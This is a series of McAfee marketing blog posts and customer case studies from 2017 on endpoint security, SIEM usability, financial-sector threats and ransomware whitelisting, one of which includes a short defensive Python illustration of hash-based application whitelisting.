Besides endpoint protection, Textron relies on McAfee for on-premises and cloud-based web protection, via McAfee Web Gateway appliances and McAfee Web Gateway Cloud Service respectively. Since McAfee ENS and McAfee Web Gateway are able to communicate using the McAfee Data Exchange Layer (DXL) fabric, Textron has the capability to add other DXL-connected solutions as well as McAfee Threat Intelligence Exchange, which shares local and global threat information in near real time. Cyr views adding DXL and Threat Intelligence Exchange as very attractive because “by the time a file [that enters through the Internet] gets to the endpoint, we’ll have scanned it and remediated it.”

Get your questions answered by tweeting @McAfee.

Widening Threat Surface and Security Gaps https://securingtomorrow.mcafee.com/business/widening-threat-surface-security-gaps/ Tue, 28 Mar 2017 19:12:40 +0000

This blog was written by Maneeza Malik.

Digital transformation, the rise of mobile banking, ongoing migration of core banking services to the cloud and a shift towards an omni-banking model have all contributed to an overall wider threat landscape for financial institutions to monitor and manage. This is further exacerbated by the fact that financial institutions operate in a highly complex and interconnected financial ecosystem connecting thousands of entities, networks and users across the globe.

Petabytes of data and billions of messages and transactions flow across this interconnected system on a daily basis, making it a daunting task to monitor, detect and block anomalous activities, elusive threats and under-the-radar attacks in real time. Cybercriminals have the potential to launch a large-scale attack by infiltrating and exploiting one ‘weak link’ in this interconnected system, targeting multiple financial institutions in various geographies simultaneously. This has vastly elevated the potential risk of “systemic” consequences for the industry at large.

On top of that, financial institutions have the added burden of operating in an environment where system, process and security silos prevail. With hundreds of disparate security tools deployed, they are constantly struggling to patch holes and close gaps in their threat defense lifecycle. Security teams are often overwhelmed with sifting through and prioritizing the vast amounts of alerts that each security tool generates, often with limited threat intelligence sharing between the various tools in a cohesive and adaptive manner.

In a recent study issued by Morgan Stanley (1), it was reported that better security tools with tighter integration and automation are needed. Suffice it to say, as the financial services industry and the world at large rapidly march towards further digital transformation, the challenge of bridging the security gaps will get increasingly difficult in an industry whose very “foundation” is built on an interconnected system linking financial institutions, payment and settlement processors and various other entities, including the third-party providers that financial institutions work with globally.

So now, the pressure is on everyone (and not just the top G20 financial institutions) to prevent cyberattacks at the scale we saw in 2016 with the Bangladesh Bank, SWIFT, and the Federal Reserve Bank of NY, or the Carbanak attack on multiple financial institutions the year prior, which resulted in nearly $1 billion in losses.

The path forward will require implementing multiple steps:

  • Implement a unified threat defense security infrastructure, one where financial institutions pivot away from disparate security solutions that have created yet another layer of silos in an already complex and fragmented technology landscape. This means security solutions need to work in an integrated, automated and adaptive manner.
  • Adopt a communication fabric built on open standards, enabling your business to easily integrate your disparate security solutions into a cohesive and adaptive threat defense lifecycle. To do that, consider a solution, such as McAfee Open DXL, that can help your institution share information easily across your security infrastructure.
  • Adopt greater collaboration practices across the industry (bringing in both the security vendor community and more banks, not just the top 100 or G20 banks). This is a burden that needs to be carried by all and not just a few.
  • Threat hunting teams need to become more pervasive in the industry and a best practice (switching from reactive to proactive mode); for more on this, read our paper on the big attacks of 2016.
  • While the industry does not need, nor would it welcome, yet another regulation, this is one area where a global cybersecurity regulation is required. This is not to penalize a handful of banks, but rather to protect an interconnected ecosystem where hundreds and thousands of entities are connected to the financial system. Everyone needs to pursue the same set of guidelines and regulatory stipulations.

What Are You Sacrificing to Protect Your Endpoints? https://securingtomorrow.mcafee.com/business/sacrificing-protect-endpoints/ Mon, 20 Mar 2017 19:00:37 +0000

This blog was written by Joakim Lialias.

Pop quiz: What’s the right balance between user flexibility and endpoint security?

It’s a trick question—there is no right answer. Or rather, there are as many answers as there are organizations. The “right” balance is a function of an organization’s culture, its approach to security, its level of in-house security expertise, and many other factors. No two businesses are the same.

A more useful approach is to look at security and flexibility as a continuum. On one end (call it “Total Control”), you can envision an organization that prioritizes endpoint protection above all else. Endpoints are locked down tight by default, with users restricted to doing only what is expressly allowed by organizational policy. On the other end (call it “Total Flexibility”), you have the opposite: employees have the freedom to do what they need to get their jobs done—install applications, open email attachments, visit external websites. Endpoints will be exposed to more threats, but the organization hopes its defenses will detect them before they can do too much damage.

Most organizations fall somewhere in the middle. But CISOs still find themselves weighing tough tradeoffs, especially when it comes to handling unknown files coming into the environment. Here again, there’s no “right” answer. But your endpoint security needs to be aligned with where you fall on that continuum. And in weighing the tradeoffs, make sure you’re not giving up the farm. 

Calculating “Costs” of Different Approaches

What exactly do organizations sacrifice when making these tradeoffs? Let’s start with an organization on the right-hand side of the continuum—say a business in consulting, advertising, or manufacturing. Your employees constantly collaborate with outside vendors and customers. Customer service and responsiveness are top priorities, so you can’t block every single unknown executable or hold up every email attachment for minutes at a time until it’s fully vetted. You’re confident your defenses will catch most of the bad stuff before it causes serious damage. But the sacrifice you’re making here is the first endpoint to get hit with a new threat—the “patient zero” infection. Cleaning up those patient zeros carries a cost that adds up quickly, as well as costs to users, whose endpoints are out of commission.

On the flip side, consider a financial or healthcare organization, or a government agency closer to the left-hand side. Your approach to unknown files is “block first, ask questions later.” Nothing executes on endpoints that hasn’t been expressly approved by IT. But there’s a cost here, too. By denying everything by default, you’ve sacrificed visibility. Your endpoint defenses effectively become a “black box.” You have no way to understand what’s attacking you, what vulnerabilities the malware is seeking to exploit, or how to beef up your defenses against that type of threat.

In both of these scenarios, the sacrifice is too great. No matter where you fall on the continuum, you ought to be able to secure patient zero while still learning from every interaction with potential threats. You should be able to implement endpoint security that’s informed by what’s happening outside your organization, and continually refined by what’s taking place within.

A Better Approach

To achieve a better balance, stop thinking about endpoint security as layers of protection that are either on or off. Rather, endpoint security should function more like a soundboard in a music studio. For some songs, you want to crank up the bass. For others, you want to emphasize the high end. There’s no need to choose between bass or treble—you can adjust different knobs to get the right mix for each song.

Your endpoint security should work the same way. You should have multiple layers of endpoint defenses at your disposal, with the ability to turn inspection and blocking at various layers up or down to best suit your organizational priorities.

When you start to think about endpoint security in this way, you can start using all the tools at your disposal in a smarter way. Because you can control how much you see, you know how much control you need to have. And wherever you fall on the continuum, you can decide what to allow or restrict on a more granular basis, while empowering your employees to be as productive as possible.

Learn More

To find out how you can tune different layers of McAfee endpoint solutions to find the right balance for your organization, join us for a webinar “Busting the Malware Silver Bullet Myth.”

Confidence in McAfee Endpoint Security Drives Widespread Adoption Across Australian School System https://securingtomorrow.mcafee.com/business/confidence-mcafee-endpoint-security-drives-widespread-adoption-across-australian-school-system/ Thu, 16 Mar 2017 15:00:23 +0000

The 103 Catholic schools overseen by Catholic Education South Australia (CESA) can use whichever endpoint security they choose. They have the option to purchase endpoint protection at a per-user or per-node cost from a CESA team that designs and delivers school-centric technology services. But they are also free to turn to other solutions.

In the past, only half of the 20,000 protectable endpoints in the region subscribed to the endpoint protection that the CESA services team provided. However, after the team switched endpoint protection to McAfee Endpoint Security (ENS) and the McAfee ePolicy Orchestrator® (ePO™) central management console, schools began signing up to receive the new endpoint protection.

According to Simon Sigré, senior network engineer and technical lead for the CESA technology services team, word spread quickly as site IT administrators and users of McAfee ENS were delighted with the improvement in protection and ease of management. Sigré also posted on the CESA Twitter feed every time ENS successfully thwarted a cyberattack. Within months, CESA had doubled the number of endpoints served to 20,000.

Sigré and the technology services team ultimately deployed McAfee ENS version 10.2 across 93 of the 103 sites, easily migrating 4,000 nodes per day. At an additional site, the team is piloting ENS version 10.5, which boasts additional improvements in performance and Real Protect machine learning and behavioral analysis detection capabilities. Sigré looks forward to upgrading all the desktops with ENS 10.2 to ENS 10.5 in the near future to take advantage of these additional enhancements.

Easier Jobs, Greater Visibility and Coverage, and Superior Detection

Why did CESA schools overwhelmingly sign up and pay to be protected by McAfee Endpoint Security? Two main reasons.

First, McAfee ENS provides superior detection and blocking. Sigré points to the ability to build behavioral rules to adapt to unique use cases as one way that ENS has strengthened CESA’s defense. For instance, over a span of nine months, the McAfee ENS behavioral detection configurations designed by the team stopped infections from 32 separate phishing campaigns masquerading as AGL (Australian Gas & Light utility) bills or Australia Post parcel collection notices. ENS prevented countless ransomware infection attempts from these campaigns by stopping their initial JavaScript from executing, potentially saving days that would have been spent in remediation.

Second, McAfee ENS makes site IT administrators’ jobs easier. Authorized administrators can log in to McAfee ePO anytime, whether or not they are within the CESA network, to see the pertinent security information they need to do their job as efficiently as possible. In addition, the CESA School Support team (another as-a-service offering provided by CESA) can continually monitor the security posture of the 70 sites it supports.

Furthermore, greater visibility and coverage enabled by McAfee ePO makes the entire school system safer. “By consolidating many separate consoles to one centralized console, we now have multiple sets of eyes looking at the same console, whether onsite or on the services team,” explains Sigré. “It’s a collective effort. As a result, we no longer have nodes falling through the cracks.”

“We haven’t had a CryptoLocker outbreak in six months,” concludes Sigré. “With McAfee Endpoint Security, we have more visibility, more coverage, and more customer confidence than we have had in 12 years.”

The full case study of CESA’s experience with McAfee Endpoint Security and McAfee ePolicy Orchestrator is available from McAfee. Get your questions answered by tweeting @McAfee.

Please Vote: Fourth Annual SANS IR Survey Wants You! https://securingtomorrow.mcafee.com/business/security-operations/please-vote-fourth-annual-sans-ir-survey-wants/ Mon, 13 Mar 2017 15:00:59 +0000

This blog was written by Barbara Kay.

Past survey findings have helped us understand key trends such as the hurdles holding back success, the evolution of SOC maturity, the data being targeted, use of automation, and priority investments for improving results. This market is changing quickly, and surveys are an excellent way to benchmark your experience against your peers and identify opportunities. Whether you want to commiserate or collaborate, data makes the conversation more compelling.

Below are two of my favorite charts from last year’s survey, with my prognostications for this year’s survey. I’ll review my predictions after the 2017 survey is published and grade myself!

What’s causing the breaches?

  • Malware will continue to dominate given malware’s contribution to so many phases of so many forms of attack, and the ubiquity of toolkits and tool sharing as well as ransomware.
  • Access-oriented attacks (unauthorized access, insider breach, privilege escalation, and data breach) should remain a top concern, and cloud services and shadow IT should continue to make these attacks both likely and challenging. Silver bullets like UBA won’t change this dynamic much.
  • Network-based attacks will continue to decline as the formal perimeter focuses on the data center rather than the entire enterprise estate.
  • I’m curious if insider breach will show an uptick rather than continued decline, as it has been trending higher in industry conversations recently.

How well are we automating our remediation?

  • Last year’s data showed a (to me) disappointing degree of manual remediation still, despite the availability of simple automation for basic remediation processes through assorted tools. But this year I think (and other surveys validate) that the industry has turned the corner and is actively pursuing “safe” automation. I certainly expect to see greater adoption of automation as we attempt to survive the expanding range and volume of incidents.
  • Automated quarantine (the top response) or taking offline are totally in scope for automation today. I’d like to see a big jump in the use of automation there. Identifying similar systems, removing malicious artifacts without rebuilding the machine, and updating policies and rules are also easily done now. Here’s hoping we see all of these make a big shift to automation.

Thanks for your help capturing the evidence of change in incident response.

SIEM is your Analyst’s Best Technology Partner https://securingtomorrow.mcafee.com/business/security-operations/siem-analysts-best-technology-partner/ Fri, 03 Mar 2017 01:00:21 +0000

The post SIEM is your Analyst’s Best Technology Partner appeared first on McAfee Blogs.

This blog post was written by Karl Klaessig.

For the average security analyst, it’s no secret that their days are overloaded with more “hair on fire” moments than “Zen” moments.

The 2016 SANS Incident Response Survey paints a clear and sobering picture of the demands being placed on security analysts. The survey lists, in order, the following impediments to effective incident response:

  • Lack of staffing and proper skills
  • Not enough visibility across systems and domains
  • Lack of budget for needed tools or technology
  • Processes and owners not clearly defined
  • Organizational siloes
  • Difficulties in detecting sophisticated attacks

All of the above results in:

  • Further weight on your analyst’s shoulders
  • Too much dwell time in mean-time-to-remediate (MTTR)

So we get it. You’ve got too many unknowns, not enough relevant insight, and functions and technologies tripping over each other trying to help sort out what is really going on! Your analysts need a technology security partner to help detect, investigate and remediate today’s never-ending threat sources.

As the threats and responsibilities have expanded, the role of the security information and event management (SIEM) solution has morphed into one of the greatest assets an analyst has, becoming the Swiss Army Knife of incident response and orchestration. Further, you reach to your SIEM for advanced analytics including user and behavior analysis, real-time monitoring, and data and application monitoring. The problem, as Barbara Kay outlines in her blog, “Eating an Elephant: How the ESM 10 UX team reenergized SecOps,” is the amount of information that the average analyst has to retain as she or he swivels from incident response, to advanced threat management, to user monitoring.

So as your SOC makes the move to more proactive threat management and predictive, contextual analysis and orchestration, we’re evolving McAfee Enterprise Security Manager (ESM) to reduce the cognitive strain, and guide and automate more of the routine tasks, such as watchlist management, incident tracking and advanced correlation rule set-up, so that you can focus on the critical decision-making responsibilities. McAfee ESM 10.0 is an important step in that evolution.

As more changes are rolled out, we want to make it easier for you to find the information you need and to stay informed. So we are providing some new communications tools for you beginning this month.

We have heard from customer surveys and from calls to McAfee Support Services that you need more guidance on where to go for more information. So we have responded with a new SIEM Information Center page – your one-stop shop for all things SIEM. On this page, you’ll find the latest and greatest advice from our SIEM subject matter experts, as well as access to shared wisdom from our SIEM user community. To make such invaluable content easier to find, we are categorizing all of our SIEM content according to the commonly recognized SIEM capability categories and use cases that our customers reference.

As a member of our McAfee ESM user community, you will be interested in the McAfee SIEM Focus newsletter that debuts this month. For those of you who subscribe to the McAfee Support Notification Service, you know how valuable and timely the ProTips, Weekly Roundup, and monthly SNS Digest emails can be. Because of the fast-moving and complex environment in which security analysts and other SIEM users operate, we want to provide you with a dedicated newsletter featuring practical use cases, demonstrations, and other in-depth, roll-up-your-sleeves examples of how to get the most from the McAfee ESM solution.

Finally, don’t miss out on the action on our SIEM Community site. We encourage you to sign up and participate with our 219 active users. We are all learning from each other. Join today, stay connected and discover for yourself how Together is Power.

School District Defends 125,000 Desktops Against Tomorrow’s Cyberthreats by Migrating to McAfee Endpoint Security https://securingtomorrow.mcafee.com/business/school-district-defends-125000-desktops-tomorrows-cyberthreats-migrating-mcafee-endpoint-security/ Thu, 02 Mar 2017 17:10:02 +0000

The post School District Defends 125,000 Desktops Against Tomorrow’s Cyberthreats by Migrating to McAfee Endpoint Security appeared first on McAfee Blogs.

“When you move from a tiny apartment, it doesn’t take long and you can use a Honda Civic,” says Desktop Security Manager Mehdi Harandi, who oversees endpoint security at Fairfax County Public Schools, the 11th largest school district in the U.S. “But when you try to move from a five-bedroom house, it takes a lot more time and the Civic just won’t cut it anymore; you need an 18-wheeler.”

Harandi uses this analogy to describe the impact on malware scanning of the exponential growth in files and data stored on the school district’s desktops. With so much data on PCs these days, full anti-virus scans simply never finished on some desktops and, in numerous cases, interrupted user productivity.

The need for an “18-wheeler”—that is, much faster, more efficient scanning—drove Harandi to migrate the school district’s 125,000 desktops from McAfee Endpoint Threat Prevention to McAfee Endpoint Security (ENS), the new more collaborative, more intelligent endpoint protection framework which also provides dramatically improved performance.

Using the migration assistant tool available through McAfee ePO, Harandi migrated the 125,000 endpoints to McAfee ENS version 10.5. “Some of our security policies apply to the McAfee Endpoint Security Threat Prevention module, some to its Firewall module, and some to its Web Control module, so the McAfee Endpoint Security migration tool helped immensely in translating from old platform to new,” explains Harandi. “It did an excellent job.”

Harandi also notes that the migration tool helped him understand the new endpoint platform better as well. “It brings you up to speed quickly and fast forwards the migration process,” he says. “It easily saved me a month if not more.”

Benefits Far Exceed Faster Performance and Happier Users

With McAfee ENS protecting all the desktops belonging to Fairfax County Public Schools, scan time is no longer a problem. “My phone used to ring off the hook on Tuesdays [full scan day] and now it doesn’t,” Harandi says. In addition, because scans are performed when desktops are idle, endless scans that seriously impacted user experience are a thing of the past.

But that’s not all. Harandi notes that upgrading to McAfee ENS has definitely improved Fairfax County Public Schools’ ability to detect malware and block it. For instance, since implementing McAfee ENS, Web-generated malware infections entering the environment through users’ laptops when they are outside the network have been substantially reduced.

In addition, the modular design of McAfee ENS makes Harandi’s job easier and saves him a lot of time. As an example, he cites a recent conflict between an application on a user’s desktop and the anti-virus scanning operation:

“In the past, I had to disable antivirus protection completely and leave the desktop unprotected until the patch became available,” he says. “But with McAfee Endpoint Security, I was able to find exactly which module was causing the issue, temporarily disable just that module, and find the conflict within less than one hour. In the past, finding such a conflict could easily have taken eight to 20 hours.”

Furthermore, McAfee ENS saves Harandi time, because, he says, “I can trust it is working…With McAfee Endpoint Security, I set it up once and then can forget about it 99 percent of the time…Management doesn’t have to hear about endpoint security at all.”

Thanks to all these benefits, Fairfax County Public Schools is in a much better position to face tomorrow’s cyberthreats, with just one person managing desktop security. “With McAfee Endpoint Security, we now have endpoint protection that positions us well for the future,” concludes Harandi.

To read the complete case study with more details on Fairfax County Public Schools’ implementation of McAfee ENS [and how Harandi almost singlehandedly manages endpoint security], click here. Get your questions answered by tweeting @McAfee_Business.

Stopping Ransomware and Polymorphic Malware https://securingtomorrow.mcafee.com/business/stopping-ransomware-polymorphic-malware/ Wed, 01 Mar 2017 14:00:12 +0000

The post Stopping Ransomware and Polymorphic Malware appeared first on McAfee Blogs.

This blog post was written by Teresa Wingfield.

One of the biggest threats to businesses today is crypto ransomware, where critical data is encrypted so that users cannot access it and a ransom is demanded to restore access. Easy availability of open-source code and drag-and-drop platforms for creating ransomware has accelerated the creation of new ransomware variants and helps scripting novices build their own. Use of anonymous currency for payment, such as Bitcoin, makes it difficult to follow the money trail and track down the criminals.

Anatomy of Ransomware

Malware needs an attack vector to establish its presence on an endpoint. Attack vectors for ransomware are standard techniques used by other malware including watering hole attacks, zero-day exploits and spear-phishing.

After a successful exploit, the ransomware drops and executes a malicious binary on the system. This binary then searches for and encrypts valuable files. Once files are encrypted, the ransomware prompts the user for a ransom payment to decrypt them; if no data backup is available, the files are otherwise lost.

Preventing Ransomware Infection with McAfee Application Control

Typically, cutting-edge malware such as ransomware is polymorphic by design, which allows it to easily bypass traditional signature-based security keyed on a file hash: every rewrite of the binary produces a new hash that no signature matches. Ransomware can nevertheless be blocked by creating a list of trusted applications and allowing only those to run. This technology is exemplified by McAfee Application Control and its two-layered defense mechanism:

  • Memory protection: Protects from memory exploits used to drop the malware binary. This helps provide protection from zero-day exploits.
  • Whitelisting: Prevents execution of binaries coming from an untrusted source. This protects against social attacks such as spear phishing when a user manually downloads malware and executes it or when a payload is dropped on a system after a user visits a compromised site or opens a compromised file.

McAfee Application Control stops file-based malware from execution and has a configurable framework to prevent execution of scripts by interpreters such as Python, Perl, and Ruby. New binaries or scripts are prevented from execution unless they arrive through a trusted mechanism.

Because McAfee Application Control does not depend on a signature, it is a reliable option to block file-based malware without daily signature-based updates. Using signature-less technology, McAfee Application Control can also block polymorphic and advanced persistent threats.

How McAfee Application Control Works

During installation, McAfee Application Control scans the entire system to identify executables, such as .exes, installed applications and scripts. These executables are whitelisted locally so that each system has its own unique local whitelist. When new ransomware enters the system and tries to execute, it will be unable to do so since it’s not part of the local whitelist.


During installation, McAfee Application Control identifies executables and reports them back to McAfee ePO as inventory items. You can analyze these executables centrally from ePO and view their reputation based on McAfee® Threat Intelligence Exchange and McAfee® Global Threat Intelligence to ban execution of bad binaries across your environment. You can use a file hash to find further information about unknown binaries from other reputation sources as well.
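As an added illustration of the default-deny, hash-keyed local whitelist described in the two paragraphs above, here is a toy implementation in Python. It is example code written for this page, not McAfee Application Control’s own implementation; the file names, the byte strings standing in for binaries, the set of executable suffixes and the central “ban by reputation” step are all constructed. It also goes one step beyond the text by showing why a hash denylist built from one sample misses a repacked (polymorphic) variant, while the whitelist blocks both because neither hash was ever trusted:

```python
import hashlib
import os
import tempfile


def sha256_file(path):
    """Hash the file's bytes; the local whitelist is keyed by this digest."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


class LocalWhitelist:
    """Per-host, default-deny execution policy keyed by file hash (constructed example)."""

    EXEC_SUFFIXES = (".exe", ".dll", ".py", ".pl", ".rb")  # assumed set of executable types

    def __init__(self):
        self.allowed = set()  # hashes inventoried at install time or added via a trusted mechanism
        self.banned = set()   # hashes banned centrally, e.g. after a reputation lookup

    def solidify(self, root):
        """Initial scan: inventory the executables present on the host and trust exactly those."""
        inventory = {}
        for dirpath, _, files in os.walk(root):
            for name in files:
                if name.lower().endswith(self.EXEC_SUFFIXES):
                    path = os.path.join(dirpath, name)
                    inventory[path] = sha256_file(path)
                    self.allowed.add(inventory[path])
        return inventory

    def decide(self, path):
        """Banned hashes never run; otherwise only hashes already on the whitelist run."""
        digest = sha256_file(path)
        if digest in self.banned:
            return "DENY: banned by reputation"
        if digest in self.allowed:
            return "ALLOW"
        return "DENY: not in local whitelist"

    def trusted_update(self, path):
        """Only a trusted mechanism (approved updater, change window) extends the whitelist."""
        self.allowed.add(sha256_file(path))


def _write(root, name, data):
    """Create a constructed stand-in for a binary on disk and return its path."""
    path = os.path.join(root, name)
    with open(path, "wb") as f:
        f.write(data)
    return path


def demo():
    """Constructed scenario: baseline host, then a dropped binary and its polymorphic variant."""
    with tempfile.TemporaryDirectory() as root:
        app = _write(root, "app.exe", b"MZ constructed-good-app-v1")
        _write(root, "helper.dll", b"MZ constructed-helper")
        _write(root, "notes.txt", b"not executable")  # data file, never inventoried

        policy = LocalWhitelist()
        inventory = policy.solidify(root)

        # A binary dropped after solidification is unknown to the whitelist and is blocked.
        dropped = _write(root, "invoice.exe", b"MZ constructed-ransomware-v1")
        # A polymorphic rewrite changes the bytes, so its hash matches no existing signature.
        variant = _write(root, "invoice2.exe", b"MZ constructed-ransomware-v1 repacked")
        policy.banned.add(sha256_file(dropped))  # the denylist only ever learns the first sample

        results = {
            "inventory_size": len(inventory),
            "baseline": policy.decide(app),
            "dropped": policy.decide(dropped),
            "variant": policy.decide(variant),
            "variant_in_denylist": sha256_file(variant) in policy.banned,
        }
        # A legitimate update is blocked until it arrives through the trusted mechanism.
        update = _write(root, "app_v2.exe", b"MZ constructed-good-app-v2")
        results["update_before"] = policy.decide(update)
        policy.trusted_update(update)
        results["update_after"] = policy.decide(update)
        return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The whitelist decision never consults a signature, so it needs no daily update to block the repacked variant; the cost of this model is operational rather than detective, which is why the `trusted_update` path (an approved installer or change process) matters as much as the deny rule.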


Learn More

For more information on McAfee Application Control, visit http://www.mcafee.com/in/products/application-control.aspx.

Eating an Elephant: How the ESM 10 UX Team Reenergized SecOps (Part 2) https://securingtomorrow.mcafee.com/business/security-operations/eating-elephant-esm-10-ux-team-reenergized-secops-2/ Mon, 27 Feb 2017 16:46:51 +0000

The post Eating an Elephant: How the ESM 10 UX Team Reenergized SecOps (Part 2) appeared first on McAfee Blogs.

This blog was written by Barbara Kay.

The second of a two-part series.

In the previous post in this series, we described how re-creating the user experience for overburdened SOC analysts was a task like “eating an elephant.” To help analysts who are constrained by time and cognitive overload, we needed a vision, a strategy and a plan to “save time and save mental energy.”

After extensive, in-depth interviews with users, we realized that the majority of user time is spent in analysis and research. This finding drove our plan. We focused first on the analysts and the workflows and workspaces where they spend the majority of their time.

Now you can see the results in ESM 10.0. The user experience team recommends these 3 things to appreciate first:

  • Quick start: you will find that the organization simplifies building and navigating relationships, so you can create views and get started without reading manuals (although we still recommend looking at the ESM expert center!). The most commonly used views appear together by default, and help you make use of associated content packs and their views, dashboards, rules, and alerts (including correct placement of related updates to keep you organized). While the donut visualizations will help you identify trends and pursue relationships, the right clicks help you navigate to next steps. And, if you are a current user, you can import existing views from within the console to bring forward your preferred processes and organizational knowledge.
Analysts can manage several tabs active at once, enabling them to toggle back and forth to pursue different tasks. This means less holding of information in your memory and less repetition, including defining complex searches.
  • Centralized, dynamic workspaces: Multiple tabs within the same dashboard pane organize parallel exploration of ideas. The analyst can simultaneously drill down and filter through different lenses of the data without losing context and state or re-applying searches and filters. With several tabs active at once, you can toggle back and forth to pursue different tasks, or within a task, collect and guide analysis or research hypotheses. This means less holding of information in your memory and less repetition, including defining complex searches. Further, a majority of our configuration, advanced settings, and set up tools now live in panels that slide in to the side of the dashboard instead of popping up in a window in front of the dashboard. This allows users to stay in context with their current investigation (stay in the same mental “room”) while they adjust settings in the various tools. In addition, the context menus mean that right clicking on a specific item—such as a field on a record within a table chart—will provide the user with quick access to actions specific to that field.
ESM 10.0 features directed search to help users quickly navigate to desired content without remembering folder structures or even the exact names of things.
  • Directed search: Detecting signal from the noise means filtering and searching through alerts and events, and avoiding the distraction of unneeded data. The new advanced search and filter organization includes auto-complete to help guide users to find or choose from relevant associations quickly, rather than needing to know what choices are appropriate to the data or investigation type. Auto-complete simplifies device selection, view management, queries, and filters, to name a few, as the user quickly navigates to the content they desire, without having to remember exactly where it resides within the folder structure of these tools. For example, we prompt for the best visualization options for each search result type to quickly filter and customize data. As you navigate, the process creates bindings that you can save for later. You can then take quick actions on data points, such as creating watchlists and case management, by accessing right-click contextual menus. Synthesizing all these workflow steps into a single place helps the right thing happen, consistently, with less effort, repetition, and time. Our improved search also means you do not need to be a software developer to extract insights quickly.

Each of the above examples reduces clock time and conserves mental energy. They are small steps in our larger plan to help you conquer that other elephant, the elephant in the room: security operations efficiency. See for yourself by downloading the new version now.

Eating an Elephant: How the ESM 10 UX Team Reenergized SecOps (Part 1) https://securingtomorrow.mcafee.com/business/security-operations/eating-elephant-esm-10-ux-team-reenergized-secops/ Wed, 22 Feb 2017 20:35:02 +0000

The post Eating an Elephant: How the ESM 10 UX Team Reenergized SecOps (Part 1) appeared first on McAfee Blogs.

This blog was written by Barbara Kay.

The first of a two-part series

For some reason, elephants figure frequently in our conversations – “seeing different parts of the elephant”, “memory like an elephant,” and now, “eating an elephant.” This phrase, definitely meant as an analogy, expresses the lengthy, enormous, and daunting task that our development team faced in reimagining the user experience in our McAfee Enterprise Security Manager (ESM) SIEM solution. To succeed, they needed a vision, strategy, and plan.

The new ESM 10.0 user interface has been designed to reduce cognitive strain – providing content in context as the user goes about tasks

First, a vision. In the last few years, driven by increasingly complex incidents, the security operations mantra has shifted to real-time analysis coupled with individual and team efficiency. Countless research studies document the shortage of skilled security analysts and researchers. Time clearly needed to be a part of the vision.

But for the user experience team, productivity isn’t just about elapsed time. It also includes the cognitive workload that can subtly wear down and exhaust the analyst. You probably experience cognitive overload today. You walk from the kitchen into the bedroom and stand there wondering why you came in. This is true when we move between physical rooms, and it’s true when we move between virtual rooms, such as in a video game or user interface. In this context switch, it turns out we are 2-3 times more likely to forget! And it gets worse. This memory lapse is aggravated if you are sleep deprived or over-stressed, like new parents, air traffic controllers, and security analysts.

Once we hit our cognitive threshold, we have only emotion to fall back on. So the typical analyst has faulty memory plus frustration. This combination makes for poor security decisions. It is why we design for “high context” UIs. We are striving for one room with all the relevant data so the analyst can focus on making good decisions.

From a design perspective, here are some specific cognitive workload tests:

  • The “data fragmentation” load: How much data does the user have to keep in his memory as he changes screens, modes, and tasks, or retain over a series of tasks?
  • The “navigation” burden: How many times does the user traverse up and down task flows and screens in pursuit of a task?
  • The “mind-numbing” factor: How many times does that task need to be repeated per hour/day/week?
  • The “clutter” factor: How much data is displayed all at once? How hard is it to identify and navigate relationships?

Instead of simply looking at faster functioning of the same processes, we wanted to reduce the cognitive burden of the user – to keep them as effective as possible for as many hours of their day as possible. This “save time, save mental energy” approach formed the core of our vision. Our logic was this: Anything we could do to improve their productivity and enhance concentration would pay off in speed of results, capacity of analysts, and quality of life for them and their management team.

This illustrates the complexity of SIEM, showing first and second level nodes in the ESM 9.X user interface.

Next, a strategy. As the epicenter of security operations, a SIEM is a complex animal, and the UI and user design can mask or multiply this complexity. The graphic gives you an idea of the scope of this effort, the first and second level nodes in the ESM 9.X user interface. Every node has multiple screens under it.

Lots to do, clearly, but where could we best affect time spent? After dozens of site visits and in-depth, interactive usage interviews, we discovered more than half of the users were security operations, and another 29% were Infrastructure Operations. Given these day-to-day jobs, the majority of user time is spent in analysis and research.

In the second part of this series, we’ll continue the user experience journey with the ESM 10.0 UX design team as they build out the plan for the new ESM 10.0 solution.

Large Healthcare Company Standardizes on McAfee ENS 10.5 and McAfee MOVE AntiVirus to Protect 100,000+ Physical and Virtual Endpoints https://securingtomorrow.mcafee.com/business/large-healthcare-company-standardizes-mcafee-ens-10-5-mcafee-move-antivirus-protect-100000-physical-virtual-endpoints/ Thu, 16 Feb 2017 16:00:25 +0000

The post Large Healthcare Company Standardizes on McAfee ENS 10.5 and McAfee MOVE AntiVirus to Protect 100,000+ Physical and Virtual Endpoints appeared first on McAfee Blogs.

Security Engineer Scott M. knows that for organizations like his, a large North American healthcare company, information security defenses must continually adapt to face new threats and to accommodate business or industry changes—else risk dire consequences.

That is why his company is beefing up its endpoint defenses by migrating from another vendor’s endpoint protection solution to McAfee Complete Endpoint Protection-Business and McAfee Endpoint Security (ENS), a more collaborative, more intelligent endpoint protection framework. Some of the company’s Windows-based desktops were migrated to ENS version 10.2 before an end-of-the-year freeze on IT changes, but the rest will be migrated directly to ENS 10.5, which will be a key component of the standard physical desktop build going forward.

Scott anticipates that ENS 10.5 will provide a huge leap in performance and protection against advanced malware. “[McAfee] ENS 10.5 looks like it is going to be amazing,” says Scott. “It reflects a long-term vision of how to address endpoint protection…The technology behind it is very solid.”

Scott also values the modular “blade” design of ENS: “It’s exactly what we’re looking for. Install what you need as opposed to a single program that has all the features and you turn some of them off. As an administrator, that’s very useful [and] adds a lot of flexibility.” Modularity also makes it easier for Scott to add functionality to ENS in the future as needed or as new capabilities become available.

Securing Virtualized Environment with Minimal Resource Consumption

In addition, as the company seeks to reap cost efficiencies by increasing the size of its virtualized environment, it is making sure that all of its virtualized endpoints are as secure as its physical endpoints.

In the next six months, the company will add 13,000 virtual workstations, bringing its total to more than 55,000, in addition to 55,000 physical workstations and 7,500 virtual and physical servers. To protect all those virtual machines, Scott deployed McAfee Management for Optimized Virtual Environments (MOVE) AntiVirus 4.0. With the same McAfee ePolicy Orchestrator® (ePO™) central console used to manage the company’s McAfee Complete Endpoint Protection-Business, he can easily manage endpoint protection across the company’s entire physical and VDI environments, ensuring that all endpoints share the same unified security policies, and view the “full security picture across platforms.”

What Scott appreciates most about McAfee MOVE AntiVirus is its efficiency. The company’s previous anti-virus protection for VDI consumed 30 percent of I/O operations just in updating definitions and pushing them out—a process that Scott had to spread across eight hours before a new update would begin. But with MOVE AntiVirus, vastly more efficient resource utilization results in minimal impact on virtual machine performance, much faster scans, and freed up resources.

